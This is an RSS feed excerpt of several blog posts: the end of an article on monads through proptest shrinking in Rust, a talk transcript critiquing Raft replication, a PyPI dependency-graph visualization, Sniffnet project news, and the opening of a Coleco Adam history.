    • Panic safety: The comparator can panic in the middle of execution. Since panics can be caught, the input should be in some kind of valid state afterwards.

    • Observation safety: If any of the inputs are mutated by the comparator, those mutations must be carried through to the final output. (With Rust, mutation through shared references is possible via interior mutability, as seen in RefCell or Mutex).

    In these cases, completing the sort successfully becomes impossible. But it’s important that we leave the input in a reasonable state.

    How do we go about testing this? Trying to think of all the different failure modes seems really hard! But property-based testing can address this need through randomized fault injection.

    Let’s focus on Ord safety for now, with a comparator that flips around the result 20% of the time:

    #[derive(Clone, Copy, Debug)]
    enum OrdBehavior {
        Regular,
        Flipped,
    }
    
    struct BadType {
        value: u64,
        ord_behavior: RefCell<Vec<OrdBehavior>>,
    }
    
    impl Ord for BadType {
        fn cmp(&self, other: &Self) -> Ordering {
            // Get the next behavior from the list.
            match self.ord_behavior.borrow_mut().pop() {
                Some(OrdBehavior::Regular) | None => {
                    self.value.cmp(&other.value)
                }
                OrdBehavior::Flipped => {
                    // Flip the behavior.
                    other.value.cmp(&self.value)
                }
            }
        }
    }
    

    To generate a BadType:

    fn generate_bad_type() -> BadType {
        // Generate a value between 0 and 10000;
        let value = /* ... */;
        // Generate a list of behaviors of length 0..128, where the elements are
        // Regular 4/5 times and Flipped 1/5 times.
        let ord_behavior: Vec<OrdBehavior> = /* ... */;
    
        BadType {
            value,
            ord_behavior: RefCell::new(ord_behavior),
        }
    }
    

    And to test this:

    #[test]
    fn test_my_sort_3() {
        // Run the test 1024 times.
        for _ in 0..1024 {
            // Generate a list of BadTypes using generate_bad_type.
            let input: Vec<BadType> = /* ... */;
    
            // Call sort as before.
            let mut output = input.clone();
            my_sort(&mut output);
    
            // Sorting isn't really well-defined in this case, but we can
            // ensure two properties:
            //
            // 1. my_sort doesn't panic (implicitly checked by getting here)
            // 2. all the input values are still present in the output
            let mut input_values: Vec<u64> =
                input.iter().map(|v| v.value).collect();
            let mut output_values: Vec<u64> =
                output.iter().map(|v| v.value).collect();
    
            // Sort the input and output values, and assert that they match.
            my_sort(&mut input_values);
            my_sort(&mut output_values);
            assert_eq!(input_values, output_values);
        }
    }
    

    Our original approach continues to work well—that is, right until the test finds a bug and we need to shrink a failing input.

    3. Integrated shrinking#

    How does one go about writing a shrinker for Vec<BadType>? Doing so seemed relatively straightforward for a list of integers. But this is a list where the elements are pairs of an integer and another list. Also:

    • We’ve just tested Ord safety so far—once we’ve added fault injection for other kinds of safety, the complexity seems endless.

    • And even more importantly, there isn’t a great way to compose smaller shrinkers together to form larger ones. Writing shrinkers is a lot of work already, and what’s the point if you have to keep doing all of it over and over?

    The practical result is that most of the time, writing a shrinker for types like Vec<BadType> is quite difficult. And writing one is also technically optional, since:

    • If the test passes, shrinkers are never invoked. Simply write correct code, and shrinking just isn’t an issue!
    • If the test fails, developers can debug using the original input. It’s painful but possible.

    All in all, given the choice of writing a shrinker by hand or just moving on with their lives, most developers tend to choose the latter2. Because of this, most modern property-based testing frameworks, like proptest in Rust, try and take care of shrinking for you through some notion of integrated shrinking.

    The idea behind integrated shrinking is: When you generate a random input, you don’t just generate the value itself. You also generate some context that is helpful for reducing the size of the input.

    • In proptest, this combined value and context is called a value tree.
    • Any implementation that accepts a random number generator and turns it into a value tree is called a strategy.

    The proptest library comes with many different kinds of strategies that can be composed together to create more complex ones. To generate an instance of OrdBehavior, we’re going to use two strategies:

    • The Just strategy, which “just” returns a single value.
    • The prop_oneof strategy, which generates values from one of a possible list of strategies, where each choice has a given probability. (A function that takes one or more strategies as input, and produces a strategy as its output, is called a combinator.)
    fn generate_ord_behavior() -> impl Strategy<Value = OrdBehavior> {
        prop_oneof![
            // 4/5 chance that the Regular implementation is generated.
            4 => Just(OrdBehavior::Regular),
            // 1/5 chance that it's flipped.
            1 => Just(OrdBehavior::Flipped),
        ]
    }
    

    To generate BadType, we’re going to use generate_ord_behavior, as well as:

    • A range strategy such as 0..10000_u64, which generates values within the range uniformly at random.
    • The vec combinator, which accepts a strategy for elements and a size parameter.
    fn generate_bad_type() -> impl Strategy<Value = BadType> {
        // Use the range strategy to generate values uniformly at random.
        let value_strategy = 0..10000_u64;
    
        // Use the vec strategy to generate a list of behaviors: 0..128 items.
        let ord_behavior_strategy = vec(generate_ord_behavior(), 0..128);
    
        // Now what? We need to compose these strategies together. With proptest,
        // the way to do this is to first create a tuple of strategies.
        let tuple_strategy = (value_strategy, ord_behavior_strategy);
    
        // A tuple of strategies is also a strategy! Generated values are a tuple
        // of constituents.
        //
        // With this in hand, we can use a function called `prop_map` to turn the
        // tuple into a BadType.
        tuple_strategy.prop_map(|(value, ord_behavior)| {
            BadType {
                value,
                ord_behavior: RefCell::new(ord_behavior),
            }
        })
    }
    
    A flowchart to show how smaller strategies flow into larger ones. See code comments in sample above for a full explanation.
    Composing smaller strategies into a larger one for BadType.

    You might be wondering where all the shrinking code is. It’s actually implemented on the corresponding value trees for each strategy:

    • Range strategies use binary search to make values smaller.
    • The Just strategy doesn’t do any shrinking, since it just returns a single value.
    • The prop_oneof combinator shrinks towards the beginning of the choices: in this case, Flipped is shrunk into Regular.
    • The vec combinator implements roughly the algorithm in Implementing a manual shrinker above.

    You can see how the base strategies get turned into successively larger ones through combinators like prop_oneof. It’s very similar to Iterator, where you can keep calling .map, .filter, .enumerate and so on over and over3.

    In my experience, composability across different scales is where this model shines. You can build bigger strategies out of smaller ones, up to a surprising amount of complexity. This means that your team can invest in a library of ever-more-complex strategies, and continue to derive value out of that library across everything from the smallest of unit tests to large integration tests.

    But there is one massive wrinkle with integrated shrinking. And that wrinkle is exactly what monads are about.

    4. Monads, finally#

    In the previous few sections, we’ve built up all the context we need. We’re now going to look at the fundamental operation that introduces monadic composition to proptest: prop_flat_map.

    Diagram comparing prop_map behavior before and after shrinking. Left panel labeled 'original' shows value=100 passing through prop_map(x²) to produce value=10000. Right panel labeled 'shrink' shows value=50 passing through the same prop_map(x²) function to produce value=2500. An arrow connects the two panels, illustrating how prop_map preserves the same transformation during shrinking, just with smaller values.
    prop_map from x to . When values are shrunk, they transparently pass through the map function.

    In the example above, there’s a function called prop_map, which we use to turn a tuple of components into a BadType value. What happens when you try and shrink a value through a prop_map? It’s very simple:

    • Attempt to get a smaller value from the underlying value tree.
    • Call the map function on the value.

    So prop_map is just a conduit that values pass through: it simply maps a value to another value, and does not change the structure of the value tree in any way.

    Now let’s say we want to test out pairs of BadType instances, where the way the second BadType is generated depends on the first. This is a situation where we don’t just want to map a value to another value—we need to generate a whole new strategy based on a value.

    This is a fundamental shift:

    • As above, prop_map transforms a value into another, but preserves the original structure.
    • This new method, prop_flat_map, goes well beyond that. Based on the value generated, it creates a brand new strategy with a structure all of its own.

    This is monadic composition in action. The result of one operation controls, at runtime, the entire shape of the next operation.

    For example, here’s one way to go about generating pairs of BadTypes, where the second value is always greater than the first:

    fn generate_bad_type_pair() -> impl Strategy<Value = (BadType, BadType)> {
        // First generate a BadType.
        generate_bad_type().prop_flat_map(
            |first_bad_type| {
                // Now generate a second BadType with a value greater than the first.
                (
                    (first_bad_type.value + 1)..20000_u64,
                    vec(generate_ord_behavior(), 0..128),
                )
                .prop_map(move |(second_value, ord_behavior)| {
                    // Generate the second value.
                    let second_bad_type = BadType {
                        value: second_value,
                        ord_behavior: RefCell::new(ord_behavior),
                    };
    
                    // Return the pair.
                    (first_bad_type.clone(), second_bad_type)
                })
            }
        )
    }
    

    Your first reaction might be: wow, this seems really powerful. And you would be right! You can write whatever you like in the body of a prop_flat_map:

    • You can conditionally return one strategy or another, reimplementing prop_oneof.
    • You can first generate a size and then return a vector with those many elements, reimplementing the vec combinator.
    • You can call prop_flat_map again, as many times as you like.

    In a real and quite rigorous sense, prop_flat_map is maximally powerful. Every combinator we’ve talked about, and in fact most of the proptest library, can be written in terms of prop_flat_map.

    So why do all these combinators exist? Why don’t we just use prop_flat_map everywhere?

    The function actually works reasonably well in practice. It generates random values with the right shape, and shrinks them correctly on a failing input.

    But.

    Shrinking is really, really slow.

    Exponentially slow.

    Diagram comparing prop_flat_map behavior before and after shrinking. Left panel labeled 'original' shows value=100 passing through prop_flat_map(0..x²) to create strategy:0..10000, which produces value=8634. Right panel labeled 'shrink' shows value=50 passing through the same function to create a completely new strategy:0..2500 (highlighted in pink), which generates multiple different outputs (value=389, value=1653, value=...). An arrow connects the original strategy to the new one, illustrating how shrinking creates an entirely new structure rather than preserving the original one.
    prop_flat_map with a map from x to the strategy 0..x². Each time the original value is shrunk, a brand-new strategy is created (highlighted in red) and the shrinker has to start over.

    Why is that the case? Consider what happens when we want to shrink a value through a prop_flat_map. As before:

    • We would attempt to get a smaller value from the underlying value tree.
    • And then, because we would call the prop_flat_map callback to generate a new strategy, we would throw away the previously-generated value tree entirely.

    Because prop_flat_map generates brand new value trees each time it’s called, shrinking has to be started again, from scratch, each time! This is the essence of monadic composition: powerful, unconstrained, and fundamentally unpredictable.

    Measuring the impact#

    We can measure the impact of monadic composition quite directly, along two related axes: the amount of time it takes to complete iterations, and the number of iterations the shrink completes in.

    For this post I wrote a small Rust program which collects metrics about shrinking for:

    • The prop_flat_map implementations for BadType pairs above, and a non-monadic implementation with prop_map (see below)
    • The same for (BadType, BadType, BadType) triples: a non-monadic implementation with prop_map, and a monadic one with two levels of prop_flat_map.

    With this program, I collected 512 samples on my workstation and analyzed the data. (I ran the program with opt-level set to 1, to mimic typical dev builds in larger Rust projects4).

    First, the amount of time it took to shrink values down, by key percentile:

    MetricPairs (prop_map)Triples (prop_map)Pairs (prop_flat_map)Triples (prop_flat_map)
    min11 µs48 µs3.85 ms8.95 ms
    p501.70 ms2.52 ms8.52 ms181 ms
    p753.74 ms5.77 ms10.04 ms307 ms
    p905.25 ms8.41 ms11.76 ms435 ms
    max7.00 ms10.55 ms15.53 ms1808 ms

    In this table, p50 represents the median completion time, while p75 and p90 show the times that 75% and 90% of the samples completed within. With prop_map, the amount of time scales somewhat linearly as we go from pairs to triples. But with just one additional level of prop_flat_map, the performance degrades dramatically, going from under 20 milliseconds to almost 2 seconds! That’s over 100x slower.

    The difference in the number of iterations is even more striking:

    MetricPairs (prop_map)Triples (prop_map)Pairs (prop_flat_map)Triples (prop_flat_map)
    min4893122811223
    p502153066722281016
    p752703549315481996
    p9031041010722693358
    max38753012242884729

    From hundreds of iterations to almost a million! And we’re working with pretty simple structures here, too. Just one more level of prop_flat_map would make shrinking quite noticeably slow, and another one after that would be disastrous.

    The data here spans several orders of magnitude. A good way to visualize this kind of data is via a CDF plotted on a logarithmic scale. In these graphs, the x-axis shows the time or iterations, and the y-axis shows the cumulative probability. Curves that are further to the right are worse, and the logarithmic scale reveals that the differences are in orders of magnitude.

    There are two log‐log scale CDF (cumulative distribution function) plots, each showing four lines labeled “pair map,” “triple map,” “pair flat_map,” and “triple flat_map.” For the top plot (cdf of shrink execution time), the x‐axis ranges roughly from 10 µs to 1 × 10^6 µs (log scale) and the y‐axis shows cumulative probability from 0.01 to 1.0 (also log scale). The “pair map” (green) and “triple map” (purple) curves overlap around 100 µs to about 1,000 µs, reaching 100% probability before the “pair flat_map” (blue) and “triple flat_map” (orange) lines. The blue line peaks around tens of thousands of microseconds, while the orange line extends further toward 1 × 10^6 µs before leveling off. For the bottom plot (cdf of number of shrink iterations), the x‐axis is the number of iterations (10 to 1 × 10^6 on a log scale) and the y‐axis is cumulative probability (0.01 to 1.0 on a log scale). Again, “pair map” (green) and “triple map” (purple) are at lower iteration counts (roughly tens to hundreds) and reach 100% probability faster. “Pair flat_map” (blue) extends to thousands of iterations, and “triple flat_map” (orange) continues to tens or hundreds of thousands of iterations before reaching 100%. A legend in the top‐right corner identifies each line’s label. In the bottom right is system information (Ryzen 7950X, Linux 6.12, Rust 1.84.1, opt‐level 1).
    Cumulative distribution functions for prop_map and prop_flat_map pairs and triples. This is a logarithmic scale, so the differences are in orders of magnitude.

    5. Rediscovering structure#

    What makes monadic composition so difficult to deal with? It has to do with the fact, mentioned above, that you can write whatever you like inside the prop_flat_map. Because a prop_flat_map can contain arbitrary computation inside of it, and that computation returns brand-new strategies, determining how a value will shrink through it is fundamentally unpredictable without actually executing it.

    In other words, the prop_flat_map callback is quite opaque. Why is that? It’s because the prop_flat_map callback is written in Rust, which is a powerful, Turing-complete language. It is impossible to fully analyze the semantics of Turing-complete languages5. (You might know this as the halting problem, or as Rice’s theorem.)

    But the fact that some analysis requires solving the halting problem is merely the start of the discussion, not the end of it! There is a rich literature on how to find approximate solutions for problems that are otherwise insoluble due to Rice’s theorem. For shrinking, here are a few approaches that are known to work.

    One option is to place limits on how long shrinking is done for. Note that prop_flat_map has no issues while generating values, just while shrinking them6. The proptest library itself sets limits on shrink iterations, particularly across prop_flat_map instances. This ensures that shrinking operations finish in a reasonable amount of time, even if they don’t produce minimal values.

    A better option is to rewrite generators to not use monadic composition. For the example above, it’s not hugely difficult7:

    fn better_generate_bad_type_pair() -> impl Strategy<Value = (BadType, BadType)> {
        // Generate two BadType instances.
        (
            generate_bad_type(),
            generate_bad_type(),
        )
        // Look, no prop_flat_map! This is non-monadic composition.
        .prop_map(|(bad1, mut bad2)| {
            // Add bad1.value to bad2.value. Because the two are non-negative
            // (unsigned integers), this ensures that bad2.value is always
            // bigger than bad1.value.
            bad2.value += bad1.value;
            (bad1, bad2)
        })
    }
    

    But this can be quite challenging as complexity goes up! The proptest library comes with a number of helpers to write non-monadic strategies, particularly prop_recursive and sample::Index. But there are real situations, particularly with large and complex data structures (for example, randomly-generated programming language syntax trees), where none of those options suffice and you have to use the full power of prop_flat_map.

    Last but not least, there’s a set of approaches that I’m going to put into the bucket of rediscovering structure across flat maps. Key to these is understanding that when you generate a random value, you’re turning an RNG, which is a random stream of bits, into concrete, structured values. Can we somehow be clever about looking at the RNG bitstream?

    • One option is to instrument the test, for example by using a fuzzer. Fuzzing is all about generating random data, looking at the branches explored, and tweaking the random data to ensure other branches are taken. It’s a great fit for peering past the black box of monadic composition.

    • Another option is to be clever with random number generator. A random number ultimately generates a sequence of ones and zeroes. Can we poke at this sequence, possibly with the help of some hints from the strategies themselves? This is implemented by the Hypothesis framework for Python; see this excellent paper about it.

    Both of these approaches are heuristic and quite complex. But that’s what you need to put together some structure again, after it’s been through the blender of monadic composition.

    In this article, we looked at monads as a design pattern: a way for a user to compose operations within a framework. We looked at both monadic functions like prop_flat_map, and non-monadic ones such as prop_map and prop_oneof. Finally, we saw how in the context of property-based testing, monadic composition has a performance impact measured in orders of magnitude.

    With this knowledge in mind, you can now spot monadic composition in all kinds of other places:

    The common thread through all of these examples is that within a framework, monadic composition is not just from value to value. It is from value to a further instance of that framework. The return value of future.await can result in more futures being spawned, monadic build nodes can generate more build nodes, and flat_map turns individual values into iterators. This freedom is what makes monads both the most flexible kind of composition, and the hardest to predict the behavior of.

    This is part of a general observation throughout programming, whenever there’s an interaction between two parties or two sides. The more restrictions there are on one side, the freer the other side is to do what it likes. Monadic composition is an extreme version of that: the most powerful and least constrained form of composition for the user, but the most difficult to deal with for the framework.

    Whether you’re a user or a library designer, pay close attention to situations where your operations are monadic. They can provide a great deal of power, perhaps too much in some circumstances. If non-monadic operations are sufficient to help you achieve your goal, prefer them.

    Thanks to Fiona and Cliff Biffle for reviewing drafts of this post. Any mistakes in it are my own.

    Updated 2025-02-20: Clarified note about Turing completeness to indicate that it is not the composition itself that’s Turing-complete—it’s the language used to write the callback in that’s at issue.

    This section contains some jargon, but it’s mostly here to satisfy the pedants who will inevitably Ctrl-F for “monad laws”. Please ignore this section if you didn’t get here through a search for that string.

    ]]>
    https://sunshowers.io/posts/monads-through-pbt/ hacker-news-small-sites-43218499 Sat, 01 Mar 2025 12:12:03 GMT
    <![CDATA[Enough with All the Raft]]> thread link) | @vrnvu
    March 1, 2025 | https://transactional.blog/talk/enough-with-all-the-raft | archive.org


    This talk is an extension of my earlier Data Replication Design Spectrum blog post. The blog post was the analysis of the various replication algorithms, which concludes with showing that Raft has no particular advantage along any easy analyze/theoretical dimension. This builds on that argument to try and persuade you out of using Raft and to supply suggestions on how to work around the downsides of quorum-based or reconfiguration-based replication which makes people shy away from them.

    Video

    Transcript

    slide 1

    Hi folks. I’m here to try and convince you to consider options other than Raft.


    slide 2

    Raft, or just leadered consensus in general and I’m using the two interchangeably in this talk, has emphatically won both on actual usage in databases by my somewhat haphazard survey…


    slide 3

    And even more subjectively it’s won by mindshare. Any discussion I see of replication is always about raft. (and this is edited, throughout this whole talk, I’m not trying to subtweet any one person/project/whatever) But it’s always Raft. Or multi-paxos. Or that viewstamped replication should be the one true replication algorithm. And this grates on me, because if you’re choosing between three options, those aren’t even the right three to be considering.


    slide 4

    I claim there’s three classes of replication algorithms[1]: Quorums, Reconfiguration, and leadered consensus as a hybrid of the two, and that all replication algorithms can be placed along a single axis which classifies them based upon how they handle failures. With quorums, the loss of any member of the replication group can be tolerated, and replication continues on. Think Cassandra. With reconfiguration, the write-all-read-one replication halts on a failure, and continues once the failed node has been automatically replaced. Historically, this is like MySQL with failover. And finally our overused Raft exists as a hybrid of the two: the followers act like quorum replication, but having a leader bumps it one tick towards reconfiguration. [1]: This is the one slide summary of what Data Replication Design Spectrum tries to pitch in terms of classification.


    slide 5

    And so this talk is framed as trying to argue my hypothetical arch-nemesis out their mental model here that Raft is the absolute best and always the correct default option, and anything else should only be used begrudgingly in some very specific cases. I’m actually trying to get to the argument of: please just use the best suited replication algorithm, but that’s going to involve some Raft bashing while sprinkling in advice on how to succeed in a non-raft world.

    So let’s get started.


    slide 6

    We’re going to first tackle the broad argument that raft is just uniformly superior. And if you tell me it’s best, I want to know, it’s best at…​ what?


    slide 7

    If it’s the best at something, I should be able to sit down, and do the math of how it acts along some dimensions versus the alternatives, and show, inarguably, that raft delivers better something than the alternatives. But I’ve done that math. I have a blog post which calculates Quorums, Raft, and Reconfiguration along these dimensions, with every notable variant or proposed raft optimization factored in.


    slide 8

    And that post shows: Raft isn’t better. In every category, it’s at best tied, and at worst, it’s the worst. Most distributed database deployments I’ve worked with have been storage bound, and that 40% higher storage efficiency for reconfiguration can mean a lot of money. Or if you care about availability, on paper, leaderless Paxos gives you better tail latencies with less availability blips than Raft. So the math isn’t justifying Raft’s absurd popularity.


    slide 9

    There’s also this draw to Raft that it’s great because of its simplicity. It’s simpler than Multi-Paxos, for sure, it did a great job at that.


    slide 10

    But in the in the broader picture, Raft isn’t simpler. Quorums have different replicas with different states and different orders of operations causing an explosion of states to check for correctness. But once you’ve handled that, all distributed systems problems of slowness, failures, partitions, what-have-you all look the same.

    Reconfiguration is the opposite. I’ve worked on FoundationDB, a very reconfiguration-based databases, and whenever some code sends an RPC, either it gets a reply or everyone gets killed and the system resets. All the code is happy-path only, as all failures get pushed through one reconfiguration process. It’s beautifully simple. But gray failures are hard, and having to precisely answer “is this other replica sufficiently alive?” is the challenge that Reconfiguration gains instead.

    And Raft is both of these things, so not only do you have to have a well-integrated failure detector for the leader, but you also have a tremendous state space to search in which bugs could be hiding from the quorum of followers. It’s not simpler.


    slide 11

    One could argue "Raft is better than Reconfiguration because Reconfiguration has unavailability!"

    This is the reconfiguration counter-argument I have encountered the most often, and this is my least favorite argument, because it’s like a matryoshka of misunderstandings.


    slide 12

    First, If you’re so upset about unavailability, what happens when the leader dies in raft? Request processing halts, there’s a timeout, a reconfiguration process (leader election), and requests resume.


    slide 13

    What happens when you use reconfiguration and a replica dies? Request processing halts, there’s a timeout, a reconfiguration process, and requests resume. It’s literally the same diagram. I just deleted some nodes. If you’re upset about this slide, you have to be equally upset about the last slide too.


    slide 14

    Furthermore, if we’re talking about replicating partitions of data, then leadership gets distributed across every machine to balance resource usage as leaders do more work. So when a machine fails, some percentage of your data is going to be "unavailable", we’re only arguing about exactly what that percent is. So, no.


    slide 15

    Furthermore, it’s an argument based out of a bad definition of the word availability. Unavailability is when requests have latency above a given threshold. If the reconfiguration process happens within your latency threshold, it’s not unavailability.


    slide 16

    The Huawei Taurus paper has an argument for reconfiguration-based replication in this vein, which is a bold argument and I love it.


    slide 17

    They’re building replication for a write ahead log, and are making a case here about their write availability for appending a new log segment.

    They say:

    • We can identify a failure quickly.

    • Our reconfiguration process is fast.

    • The chance of us being unable to find 3 new working nodes is effectively 0.

    • Therefore our change of being unavailable is effectively 0%.

    And that’s the correct way to look at availability. You can hate this argument, you can still poke some minor holes in it, but they’re not wrong.


    slide 18

    There is a correct counter-argument here, and it’s that you cannot solve consensus with two failures using three nodes. So when raft is electing a new leader or changing its replicas, it can do that itself. Reconfiguration-based replication needs some external consensus service to lean on. But the options of what you can use for that are ever more plentiful. With S3 supporting compare-and-swap now, you can even use S3 as your consensus service. But this is a design requirement difference from Raft.


    slide 19

    For concrete advice on how to build systems using an external consensus service to manage membership, the PacificA paper gives a very nice description of how to do this, and how manage an automatic failover and reconfiguration process safely. It has already been directly adopted Elasticsearch, and Kafka’s replication is very similar in spirit.


    slide 20

    Moving onto the Quorums side, one could argue "Raft is better than Quorums because Quorums livelock on contention!"

    Simple majority quorums doesn’t livelock, so we’re talking about leaderless consensus here only, and this is a known concern. But there’s ways to minimize or work around this issue.[2] [2]: Unmentioned in this talk is "just put the replicas closer together", like Tencent’s PaxosStore, because that’s not as general of advice.


    slide 21

    First, don’t keep the raft mental model that operations need to go into a log, and all operations need to go into one log. Target your operations to the specific entity or entities that you’re modifying, so that you contend only on what you actually need to.


    slide 22

    You don’t even need to materialize a log if you don’t need a log. Compare-and-Swap Paxos, just models evolving your entity from one state to the new state with no “put things into a log” step in-between. And it’s a great example of being simpler than Raft — Denis’s example implementation with membership changes is 500 lines of code.

    If you’re looking for a weekend implement consensus project, this is what I’d recommend doing.


    slide 23

    Second, and this is the trick I see applied the least often, but remember that even when modifying the same entity, you don’t need to have all replicas agree on an ordering for commutative operations — those which yield the same result regardless of what order they’re performed in. Increments are the easiest example. Every replica agrees that at the end it’s a net plus six here, and this is safe to do as long as no one sees an intermediate result.


    slide 24

    Permitting commutative operations to commit concurrently while banning reads requires cooperation from your concurrency control layer too. You can read about increment locks in database textbooks, but escrow transactions is the most fun. If I try to deposit $100 and withdraw $100 from my bank account, those might be commutative operations. If I have zero dollars, it matters if the withdrawal gets ordered before the deposit. If I’m a billionaire, it doesn’t matter. Escrow Transactions pitches how to handle even these sorts of "conditionally commutative" situations so that you can get your contention down as low as possible.


    slide 25

    Lastly, the livelock stems from inconsistent ordering of requests across replicas, and you can also take a dependency on physical clocks to help consistently order requests instead. There’s an E-Paxos Revisited[3] paper which gives a focused pitch on this idea as well, but I’d strongly suggest checking out Accord, Cassandra’s new strictly serializable transaction protocol, that’s an industry implementation of leaderless consensus, and avoiding livelock by leaning on a physical time based ordering. [3]: E-Paxos is the classic example of targeting only the entities one wishes to modify within paxos, but there’s aspects of it which haven’t been fully scoped out for real-world implementation. Most of these are centered around that E-Paxos maintains a DAG of operations (where edges are conflicts) which makes a number of aspects of a real system (e.g. replica catchup or garbage collection) significantly harder to do efficiently. I only know of Cassandra having an implementation of it which was never merged, and they ended up going towards extending E-Paxos into Accord instead.


    slide 26

    So to wrap this up, I’m not here to pitch you that Raft never has a use. Going through these arguments was to show that there are limitations to Quorums and Reconfiguration, and talk about how you can best work around those limitations. But each side has a critical flaw, and the one advantage that Raft uniquely has, is its unrelenting, unwavering mediocrity. It is less efficient, it is less “available”, and it is more complicated, but there’s no situation in which Raft isn’t an “okay” solution. It’s a safe choice. But, broadly, categorically, and littered with minor factual issues, not using raft gets you a system thats’s better at something.


    slide 27

    So the mental model I’d like to leave you with is:

    • Use Quorums or Raft if you can’t have any other supporting service to help with group membership.

    • Use Reconfiguration or Raft if you must handle high, single-item contention.

    If you need both of these things, then you might have to use Raft. But using Raft is your punishment. You’re forced to use a resource in-efficient, complex solution, because your design constraints left you with no wiggle room.


    slide 28

    Please use the replication algorithm that best fits your use case. It’s possible that is Raft. That’s fine. But reconfiguration is 40% cheaper by instance count than Raft. If I go to your database’s users and ask if they’re fine with slightly higher tail latency in exchange for 40% off their hardware cost, how many are going to say no? Or if tail latency is really that important to them, would they not be happier with Quourms? Use what fits your users' needs the best.


    slide 29

    If you’re interested in some further food for thought here, looking at disaggregated OLTP systems is a really interesting replication case study. Each of the major vendors chose a completely different replication solution, and so if you read through the series of papers you see what effects those choices had, and get to read the criticisms that the later papers had of the earlier ones' decisions.


    ]]>
    https://transactional.blog/talk/enough-with-all-the-raft hacker-news-small-sites-43218379 Sat, 01 Mar 2025 11:51:09 GMT
    <![CDATA[A Map of Python]]> thread link) | @fi-le
    March 1, 2025 | https://fi-le.net/pypi/ | archive.org

    PyPi, the Python Software Foundation's package repo, counts over half a million open source projects. Since I use many of these every day, it seemed appropriate to get to know this set of packages better, and show some appreciation. The index website provides nice search and filtering, which is good when looking for something specific. Here though, we want to take a look at every package at once, to construct a visualization, and perhaps even discover some cool new packages.

    To visualize the set, then, we need to find out its structure. Luckily PyPi provides a nice JSON API (see here for numpy's entry for instance) and even luckier, there is a copy on BigQuery so that we don't have to bother the poor PyPi servers with >600,000 requests.

    One SQL query later, we have a .jsonl of all the metadata we want. So what metadata do we want? Since we want to uncover the internal structure of the dataset, we focus on the defining feature of open source and look at the dependencies of each package. This gives a natural directed graph topology. For once, dependency hell is actually helpful!

    Half a million nodes is a lot for an interactive graph - good motivation to look at the data more closely. As all big datasets, the BigQuery mirror is messy, containing many not-so-classic Python packages like "the-sims-freeplay-hack", "cda-shuju-fenxishi-202209-202302" and other collateral. These seem to have been detected and taken down by PyPi, because they don't have a package website. To get down to a reasonable sized dataset, we therefore filter for packages where some important columns aren't null. This gets us down to around 100000, so we somewhat arbitrarily filter for packages with more than 2 dependencies (and let them fill us in on the packages that they depend upon) for a smaller test dataset. We use all dependencies, including experimental, development and testing ones.

    Graph layouts are a classic computer science problem, and we can use handy software designed exactly for this kind of task, like Gephi. This lets us use an algorithm of our choice, and after playing around with a few, I find that the default Force Atlas 2, an iterative spring-energy minimization, does the best job. This was expected! (This amazing talk by Daniel Spielman will convince you to love force-directed graph layouts, if you don't yet.)

    Here is the interactive graph:

    I would have expected a very tightly knit cloud centering around the most common packages as the result, with little clustering. This is more or less what happens - two dimensions are just not enough to capture the neighborhoods of a highly connected graph. The mean degree is 4.97. But that is not the whole story.

    We obtain clusters of packages that depend on the same set of packages. Some are innocent: Only depending on numpy for example is a very good thing, in fact I wish that cluster was bigger. Another cluster though, it contains only packages depending on "peppercorn", "check-manifest" and "coverage". In there, we find packages with names like "among-us-always-imposter-hack". Good job for passing the previous filter I suppose! These are copied from a template python package called pqc, and were uploaded uninitialized. Those with obviously spammy names are taken down, but some weird ones remain. A subcluster of 10 packages named variations of "python-smshub-org" sits in there since an upload in May 2019. As far as I can tell they no currently online packages contain malicious code, but I feel this is a proof of concept that graph drawing can find anomalies. Neat!

    Some organizations generate a lot Python packages. An enterprise software miscellanea company called Triton, for instance, puts out over 300 packages with their name in it. They all depend on the same base package and are thus visualized close together. Perhaps the biggest one is another enterprise software company, Odoo, whose main package has over 3000 child packages. Similar groupings include a data pipeline company called Airbyte with 320 packages, the Objective C bridge PyObjC with 167 packages and the content management system Plone. A corporate API client called aiobotocore apparently uses 421 packages only for its types.

    The energy-based layout also finds recognizable semantic neighborhoods. Some, I know better, such as north of numpy, where scikit-learn, seaborn and tensorflow are hanging out. Others less, like the region around cryptography. This is already a nice way to window shop some packages, but I am very sure that this only scratches the surface of this dataset. Some further steps would be to visualize recursive dependency trees nicely, improve performance, and add search. Next up: Rust crates, CRAN, Hackage?

    For replicating this, see the accompanying repository.

    ]]>
    https://fi-le.net/pypi/ hacker-news-small-sites-43218343 Sat, 01 Mar 2025 11:44:18 GMT
    <![CDATA[Sniffnet now has an official Blog]]> thread link) | @GyulyVGC
    March 1, 2025 | https://sniffnet.net/news/ | archive.org

    Follow Sniffnet to receive the latest project news and updates.

  • Sniffnet official merchandise released!

    February 17, 2025

    Post thumbnail

    Post thumbnail

    Sniffnet merch is finally real 🎉 A couple weeks ago Sniffnet reached the remarkable milestone of 20k stars on GitHub — to celebrate we’re dropping brand new apparel today! Such an awesome logo had to be featured on physical goods sooner or later 🕵️‍♂️ [Read More]

  • Sniffnet will be supported by the Next Generation Internet program

    October 14, 2024

    Post thumbnail

    Post thumbnail

    It’s such a joy for me to announce that Sniffnet was elected to receive funding from NLnet. The NLnet Foundation supports organizations and people who contribute to an open internet for all. It funds projects that help fix the internet through open hardware, open software, open standards, open science and... [Read More]

  • Sniffnet v1.3: thumbnail mode, PCAP export, and more

    April 8, 2024

    Post thumbnail

    Post thumbnail

    After some months without new major releases, I’m happy to announce that Sniffnet v1.3 is finally out! 🎉 This release introduces several long requested features, such as export of PCAP files, support for ICMP, detection of more upper layer services, and other functionalities to improve the overall user experience, such... [Read More]

  • ]]>
    https://sniffnet.net/news/ hacker-news-small-sites-43218342 Sat, 01 Mar 2025 11:43:20 GMT
    <![CDATA[The Coleco Adam: An 8-Bit Personal Computer Failure]]> thread link) | @rbanffy
    March 1, 2025 | https://www.goto10retro.com/p/the-coleco-adam-an-8-bit-personal | archive.org

    The Coleco Adam was a personal computer (really, a home computer) system released by Coleco in 1983. Before we dive into it in more detail, let’s take a quick look at the nascent personal computer and game console market leading up to then.

    The 8-bit personal computer industry started in 1977 with the “trinity” of computers that were released that year: Apple II, TRS-80 and Commodore PET. Also released in 1977 was the Atari VCS game console.

    In 1979, Apple introduced the enhanced Apple II+ and Atari introduced their 400 and 800 computers.

    In 1982, Commodore release the C64 and Coleco released the ColecoVision game console. Both of these would prove to be rather popular, which is a major understatement when talking about the C64.

    The ColecoVision took on the Atari 2600 (formally VCS) and Atari 5200. The 2600 had weak graphics and poor arcade ports, while the 5200 failed pretty quickly. The ColecoVision, with its much better graphics and arcade ports, was a bigger success as the better quality games made it worthwhile for more serious gamers.

